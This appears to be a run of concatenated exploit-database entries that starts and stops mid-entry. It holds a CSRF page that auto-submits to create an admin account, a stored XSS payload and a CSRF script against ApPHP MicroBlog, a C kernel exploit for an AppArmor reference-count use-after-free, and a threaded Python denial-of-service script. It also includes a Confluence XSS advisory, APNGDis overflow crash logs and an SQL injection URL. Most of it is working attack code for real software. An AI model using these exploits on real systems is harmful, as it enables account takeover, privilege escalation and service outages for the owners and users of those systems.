<input type="hidden" name="mg_operation_type" value=" " />
<input type="hidden" name="mg_operation_field" value=" " />
<input type="hidden" name="mg_search_status" value=" " />
<input type="hidden" name="mg_language_id" value=" " />
<input type="hidden" name="mg_operation_code" value="yh0ox75feagwqbccp8ef" />
<input type="hidden" name="token" value="dbe0e51cf3a5ce407336a94f52043157" />
<input type="hidden" name="date_lastlogin" value=" " />
<input type="hidden" name="date_created" value="2016-10-12 21:14:06" />
<input type="hidden" name="first_name" value="meryem" />
<input type="hidden" name="last_name" value="ak" />
<input type="hidden" name="email" value="mmm@yopmail.com" />
<input type="hidden" name="user_name" value="meryem" />
<input type="hidden" name="password" value="meryem" />
<input type="hidden" name="account_type" value="admin" />
<input type="hidden" name="preferred_language" value="en" />
<input type="hidden" name="is_active" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
############ ########## ############
*-* Thanks Meryem AKDOĞAN *-*
# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross
Site Scripting
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162
Description :
Vulnerable link : http://site_name/path/index.php?page=posts&post_id=
Stored XSS Payload ( Comments ): *
# Vulnerable URL :
http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name
############ POST DATA ############
task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
your comment
############ ######################
# Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162
########################### CSRF PoC ###############################
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "
http://site_name/path/index.php?admin=authors_management", true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---------------------------25472311920733601781889948655");
xhr.withCredentials = true;
var body =
"-----------------------------25472311920733601781889948655\r\n" +
"Content-Disposition: form-data; name=\"mg_action\"\r\n" +
"\r\n" +
"create\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_rid\"\r\n" +
"\r\n" +
"-1\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_sorting_fields\"\r\n"
+
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_sorting_types\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_page\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_operation\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_operation_type\"\r\n"
+
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_operation_field\"\r\n"
+
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_search_status\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_language_id\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"show_about_me\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"account_type\"\r\n" +
"\r\n" +
"author\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"last_login\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"first_name\"\r\n" +
"\r\n" +
"Mehmet\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"last_name\"\r\n" +
"\r\n" +
"mersin\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"mehmet@yopmail.com\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"user_name\"\r\n" +
"\r\n" +
"Zer0\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"password\"\r\n" +
"\r\n" +
"mehmet\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"avatar\";
filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"about_me\"\r\n" +
"\r\n" +
"denemddendemdendjendk\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"is_active\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------25472311920733601781889948655--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
####################################################################
[RCESEC-2016-009] AppFusions Doxygen for Atlassian Confluence v1.3.2 renderContent() Persistent Cross-Site Scripting
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: AppFusions Doxygen for Atlassian Confluence
Vendor URL: www.appfusions.com
Type: Cross-site Scripting [CWE-79]
Date found: 29/06/2016
Date published: 20/11/2016
CVSSv3 Score: 6.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)
CVE: -
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
AppFusions Doxygen for Atlassian Confluence v1.3.3
AppFusions Doxygen for Atlassian Confluence v1.3.2
AppFusions Doxygen for Atlassian Confluence v1.3.1
AppFusions Doxygen for Atlassian Confluence v1.3.0
older versions may be affected too.
4. INTRODUCTION
===============
With Doxygen in Confluence, you can embed full-structure code documentation:
-Doxygen blueprint in Confluence to allow Doxygen archive imports
-Display documentation from annotated sources such as Java (i.e., JavaDoc),
C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and UNO/OpenOffice
flavors), Fortran, VHDL, Tcl, D in Confluence.
-Navigation supports code structure (classes, hierarchies, files), element
dependencies, inheritance and collaboration diagrams.
-Search documentation from within Confluence
-Restrict access to who can see/add what
-Doxygen in JIRA also available
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The application offers the functionality to import Doxygen documentations via a file upload to make them available in a Confluence page, but does not properly validate the file format/the contents of the uploaded Doxygen file. Since the uploaded file is basically a zipped archive, it is possible to store any type of file in it like an HTML file containing arbitrary script.
In DoxygenFileServlet.java (lines 82-105) the "file" GET parameter is read
and used as part of a File object:
private void renderContent(HttpServletRequest request, HttpServletResponse response) throws IOException {
String pathInfo = request.getPathInfo();
String[] pathInfoParts = pathInfo.split("file/");
String requestedFile = pathInfoParts[1];
File homeDirectory = this.applicationProperties.getHomeDirectory();
String doxygenDir = homeDirectory.getAbsolutePath() + File.separator + "doxygen";
File file = new File(doxygenDir, requestedFile);
String contentType = this.getServletContext().getMimeType(file.getName());
if (contentType == null) {
contentType = "application/octet-stream";
}
response.setContentType(contentType);
FileInputStream inputStream = null;
ServletOutputStream outputStream = null;
try {
inputStream = new FileInputStream(file);
outputStream = response.getOutputStream();
IOUtils.copy((InputStream)inputStream, (OutputStream)outputStream);
}
finally {
IOUtils.closeQuietly((InputStream)inputStream);
IOUtils.closeQuietly((OutputStream)outputStream);
}
}
6. RISK
=======
To successfully exploit this vulnerability, the attacker must be authenticated and must have the rights within Atlassian Confluence to upload
Doxygen files (default).
The vulnerability allows remote attackers to permanently embed arbitrary script code into the context of an Atlassian Confluence page, which offers a wide range of possible attacks such as redirecting users to arbitrary pages, present phishing content or attacking the browser and its components of a user visiting the page.
7. POC
===========
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40817.zip
8. SOLUTION
===========
Update to AppFusions Doxygen for Atlassian Confluence v1.3.4
9. REPORT TIMELINE (DD/MM/YYYY)
===============================
23/08/2016: Discovery of the vulnerability
23/08/2016: Sent preliminary advisory incl. PoC to known mail address
30/08/2016: No response, sent out another notification
30/08/2016: Vendor response, team is working on it
20/10/2016: Vendor releases v1.3.4 which fixes this vulnerability
20/11/2016: Advisory released
9. REFERENCES
=============
https://bugs.rcesecurity.com/redmine/issues/13
/*
There's a reference count leak in aa_fs_seq_hash_show that can be used to overflow the reference counter and trigger a kernel use-after-free
static int aa_fs_seq_hash_show(struct seq_file *seq, void *v)
{
struct aa_replacedby *r = seq->private;
struct aa_profile *profile = aa_get_profile_rcu(&r->profile); // <--- takes a reference on profile
unsigned int i, size = aa_hash_size();
if (profile->hash) {
for (i = 0; i < size; i++)
seq_printf(seq, "%.2x", profile->hash[i]);
seq_puts(seq, "\n");
}
return 0;
} // <-- no reference dropped
See attached for a PoC that triggers a use-after-free on an aa_label object on Ubuntu 15.10 with the latest 4.2.0.35 kernel; the Ubuntu kernel appears to use an older version of AppArmor prior to some refactoring, but the same issue is present.
static int aa_fs_seq_hash_show(struct seq_file *seq, void *v)
{
struct aa_replacedby *r = seq->private;
struct aa_label *label = aa_get_label_rcu(&r->label); // <--- takes a reference on label
struct aa_profile *profile = labels_profile(label);
unsigned int i, size = aa_hash_size();
if (profile->hash) {
for (i = 0; i < size; i++)
seq_printf(seq, "%.2x", profile->hash[i]);
seq_puts(seq, "\n");
}
return 0;
} // <--- no reference dropped
I noticed in reproducing this issue that it appears that there has been a patch applied to the very latest Ubuntu kernel shipped in 16.04 that fixes this that hasn't been upstreamed or backported.
The fix is just to correctly drop the acquired reference.
index ad4fa49..798d492 100644
--- a/security/apparmor/apparmorfs.c
+++ b/security/apparmor/apparmorfs.c
@@ -331,6 +331,7 @@ static int aa_fs_seq_hash_show(struct seq_file *seq, void *v)
seq_printf(seq, "%.2x", profile->hash[i]);
seq_puts(seq, "\n");
}
+ aa_put_profile(profile);
return 0;
}
*/
#include <unistd.h>
#include <fcntl.h>
#include <keyutils.h>
#include <err.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/apparmor.h>
#define BASE_PATH "/sys/kernel/security/apparmor/policy/profiles/sbin.dhclient.2"
#define HASH_PATH BASE_PATH "/sha1"
void add_references(int hash_fd, int refs_to_add) {
char buf[1];
for (int i = 0; i < refs_to_add; ++i) {
pread(hash_fd, buf, sizeof(buf), 0);
}
}
int main(int argc, char** argv) {
int hash_fd;
int fds[0x100];
pid_t pid;
hash_fd = open(HASH_PATH, O_RDONLY);
if (hash_fd < 0) {
err(-1, "failed to open HASH_PATH");
}
fprintf(stderr, "[*] forking to speed up initial reference count increments\n");
for (int i = 0; i < 0xf; ++i) {
if (!fork()) {
add_references(hash_fd, 0x11111100);
exit(0);
}
}
for (int i = 0; i < 0xf; ++i) {
int status;
wait(&status);
}
fprintf(stderr, "[*] initial reference count increase finished\n");
fprintf(stderr, "[*] entering profile\n");
aa_change_profile("/sbin/dhclient");
pid = fork();
if (pid) {
for (int i = 0; i < 0x100; ++i) {
fds[i] = open("/proc/self/net/arp", O_RDONLY);
}
}
else {
add_references(hash_fd, 0x100);
exit(0);
}
fprintf(stderr, "[*] past the point of no return");
sleep(5);
for (int i = 0; i < 0x100; ++i) {
close(fds[i]);
}
}
#!/usr/bin/python
#coding: utf-8
# *********************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * ApowerManager Remote Denial of Service (DoS) / Application Crash *
# *********************************************************************
# Exploit Title: ApowerManager - Phone Manager Remote Denial of Service (DoS) / Application Crash
# Date: 2019-02-14
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Vendor Homepage: https://www.apowersoft.com/phone-manager
# Software Link: https://www.apkmonk.com/download-app/com.apowersoft.phone.manager/4_com.apowersoft.phone.manager_2019-01-08.apk/
# Version: <= ApowerManager - Phone Manager 3.1.7
# Tested on: Android
import sys, requests, threading, signal
def handler(signum, frame):
print '\nFinishing program...\n'
sys.exit(0)
if len(sys.argv) != 3:
print "\nUsage: python " + sys.argv[0] + " <ip_address> <port>\n"
print "Example: python apowermanager_dos.py 192.168.1.125 2333\n"
sys.exit(0)
def startAttack(url):
url_destination = url + '/?Key=PhoneRequestAuthorization'
headers = {'Origin': url, 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'es-ES,es;q=0.9,en;q=0.8', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36', 'Content-Type': 'text/plain;charset=UTF-8', 'accept': 'text/plain', 'Referer': url, 'Connection': 'keep-alive'}
r = requests.post(url_destination, headers=headers)
if __name__ == '__main__':
signal.signal(signal.SIGINT, handler)
url = 'http://' + sys.argv[1] + ':' + sys.argv[2]
threads = []
for i in xrange(0, 10000):
t = threading.Thread(target=startAttack, args=(url,))
threads.append(t)
for x in threads:
x.start()
for x in threads:
x.join()
# Exploit Title: APNGDis image width / height Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6193
Additional analysis:
https://www.onvio.nl/nieuws/cve-2017-6193
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41669.png
In the first bytes of the PoC, positions +0x10 through +0x17 are malformed to contain large values:
‰ P N G . . . . . . . . I H D R
89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52
. . . . . . . .
00 0F 00 00 00 0F 00 00
^ ^ ^ ^ ^ ^ ^ ^
Valgrind:
Reading '../w_h_chunk_poc.png'...
==10563== Invalid read of size 8
==10563== at 0x4C30260: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Address 0x5edb3c8 is 28,792 bytes inside a block of size 65,593 free'd
==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176)
==10563== by 0x10A9FD: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:361)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Block was alloc'd at
==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299)
==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58)
==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158)
==10563== by 0x10A891: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:337)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563==
==10563== Invalid write of size 8
==10563== at 0x4C30265: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Address 0x5edbad8 is 30,600 bytes inside a block of size 65,593 free'd
==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176)
==10563== by 0x10A9FD: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:361)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Block was alloc'd at
==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299)
==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58)
==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158)
==10563== by 0x10A891: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:337)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563==
==10563== Invalid read of size 8
==10563== at 0x4C30272: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Address 0x5edb3b8 is 28,776 bytes inside a block of size 65,593 free'd
==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176)
==10563== by 0x10A9FD: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:361)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Block was alloc'd at
==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299)
==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58)
==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158)
==10563== by 0x10A891: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:337)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563==
==10563== Invalid read of size 8
==10563== at 0x4C30140: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Address 0x0 is not stack'd, malloc'd or (recently) free'd
==10563==
==10563==
==10563== Process terminating with default action of signal 11 (SIGSEGV)
==10563== Access not within mapped region at address 0x0
==10563== at 0x4C30140: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== If you believe this happened as a result of a stack
==10563== overflow in your program's main thread (unlikely but
==10563== possible), you can try to increase the size of the
==10563== main thread stack using the --main-stacksize= flag.
==10563== The main thread stack size used in this run was 8388608.
==10563==
==10563== HEAP SUMMARY:
==10563== in use at exit: 16,777,901 bytes in 10 blocks
==10563== total heap usage: 24 allocs, 14 frees, 16,997,058 bytes allocated
==10563==
==10563== 64 bytes in 2 blocks are definitely lost in loss record 6 of 9
==10563== at 0x4C2C93F: operator new[](unsigned long) (vg_replace_malloc.c:423)
==10563== by 0x10B4ED: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:112)
==10563== by 0x10A24D: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:244)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563==
==10563== LEAK SUMMARY:
==10563== definitely lost: 64 bytes in 2 blocks
==10563== indirectly lost: 0 bytes in 0 blocks
==10563== possibly lost: 0 bytes in 0 blocks
==10563== still reachable: 16,777,837 bytes in 8 blocks
==10563== suppressed: 0 bytes in 0 blocks
==10563== Reachable blocks (those to which a pointer was found) are not shown.
==10563== To see them, rerun with: --leak-check=full --show-leak-kinds=all
==10563==
==10563== For counts of detected and suppressed errors, rerun with: -v
==10563== ERROR SUMMARY: 1028641 errors from 5 contexts (suppressed: 0 from 0)
Segmentation fault
w_h_chunk_poc.png
# Exploit Title: APNGDis filename Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6191
Additional analysis:
https://www.onvio.nl/nieuws/cve-2017-6191-apngdis-filename-buffer-overflow
Textbook buffer overflow; a fixed size buffer gets allocated with
szPath[256], and the first command line argument is stored without
validation.
int main(int argc, char** argv)
{
unsigned int i, j;
char * szInput;
char * szOutPrefix;
char szPath[256];
char szOut[256];
std::vector frames;
printf("\nAPNG Disassembler 2.8\n\n");
if (argc > 1)
szInput = argv[1];
else
{
printf("Usage: apngdis anim.png [name]\n");
return 1;
}
strcpy(szPath, szInput);
}
With 'A' * 1000 as argv[1] :
GDB:
Program received signal SIGSEGV, Segmentation fault.
strlen () at ../sysdeps/x86_64/strlen.S:106
106 ../sysdeps/x86_64/strlen.S: No such file or directory.
(gdb) i r
rax 0x4141414141414141 4702111234474983745
rbx 0x7ffff70ea600 140737338320384
rcx 0x141 321
rdx 0x0 0
rsi 0x7fffffffca40 140737488341568
rdi 0x4141414141414141 4702111234474983745
rbp 0x7fffffffceb0 0x7fffffffceb0
rsp 0x7fffffffc948 0x7fffffffc948
r8 0x4141414141414141 4702111234474983745
r9 0x9 9
r10 0x73 115
r11 0x7fffffffce78 140737488342648
r12 0x555555558c9f 93824992251039
r13 0x7fffffffcec8 140737488342728
r14 0x0 0
r15 0xffffffffffffffff -1
rip 0x7ffff6dd1486 0x7ffff6dd1486 <strlen+38>
eflags 0x10297 [ CF PF AF SF IF RF ]
Valgrind:
==10685== Invalid read of size 1
==10685== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==10685== by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
==10685== by 0x5B711F8: printf (printf.c:33)
==10685== by 0x109F05: load_apng(char*, std::vector<APNGFrame,
std::allocator<APNGFrame> >&) (apngdis.cpp:200)
==10685== by 0x10B24E: main (apngdis.cpp:498)
==10685== Address 0x4141414141414141 is not stack'd, malloc'd or
(recently) free'd
==10685==
==10685==
==10685== Process terminating with default action of signal 11 (SIGSEGV)
==10685== General Protection Fault
==10685== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==10685== by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
==10685== by 0x5B711F8: printf (printf.c:33)
==10685== by 0x109F05: load_apng(char*, std::vector<APNGFrame,
std::allocator<APNGFrame> >&) (apngdis.cpp:200)
==10685== by 0x10B24E: main (apngdis.cpp:498)
Reading '==10685==
==10685== HEAP SUMMARY:
==10685== in use at exit: 0 bytes in 0 blocks
==10685== total heap usage: 2 allocs, 2 frees, 73,728 bytes allocated
==10685==
==10685== All heap blocks were freed -- no leaks are possible
# Exploit Title: APNGDis chunk size descriptor Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6192
Additional analysis:
https://www.onvio.nl/nieuws/cve-2017-6192
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41668.png
The PoC contains an IHDR chunk size descriptor of 0xFFFFFFF4
‰ P N G . . . . ÿ ÿ ÿ ô I H D R
89 50 4E 47 0D 0A 1A 0A FF FF FF F4 49 48 44 52
^ ^ ^ ^
Bash:
Reading '../ihdr_chunk_size_poc.png'...
*** Error in `./apngdis': free(): invalid next size (fast): 0x00005556a08d2270 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f932b0adbcb]
/lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f932b0b3f96]
/lib/x86_64-linux-gnu/libc.so.6(+0x7778e)[0x7f932b0b478e]
./apngdis(+0x2e2f)[0x55569f636e2f]
./apngdis(+0x324f)[0x55569f63724f]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7f932b05d2b1]
./apngdis(+0x16ca)[0x55569f6356ca]
Valgrind:
Reading '../ihdr_chunk_size_poc.png'...
==10383== Invalid write of size 4
==10383== at 0x10B502: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:113)
==10383== by 0x109F96: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:206)
==10383== by 0x10B24E: main (apngdis.cpp:498)
==10383== Address 0x5ed3370 is 0 bytes after a block of size 0 alloc'd
==10383== at 0x4C2C93F: operator new[](unsigned long) (vg_replace_malloc.c:423)
==10383== by 0x10B4ED: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:112)
==10383== by 0x109F96: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:206)
==10383== by 0x10B24E: main (apngdis.cpp:498)
==10383==
==10383== Invalid write of size 1
==10383== at 0x4C330AD: __GI_mempcpy (vg_replace_strmem.c:1518)
==10383== by 0x5B94B0D: _IO_file_xsgetn (fileops.c:1400)
==10383== by 0x5B89AA8: fread (iofread.c:38)
==10383== by 0x10B52B: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:114)
==10383== by 0x109F96: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:206)
==10383== by 0x10B24E: main (apngdis.cpp:498)
==10383== Address 0x5ed338c is 28 bytes after a block of size 0 in arena "client"
==10383==
valgrind: m_mallocfree.c:303 (get_bszB_as_is): Assertion 'bszB_lo == bszB_hi' failed.
valgrind: Heap block lo/hi size mismatch: lo = 64, hi = 90194313415.
source: https://www.securityfocus.com/bid/46896/info
AplikaMedia CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/page_info.php?id_brt=[Sql_injection]
# Exploit Title: Aplaya Beach Resort Online Reservation System 1.0 - Multiple Vulnerabilities
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/aplaya.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit
#
POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1
Host: TARGET
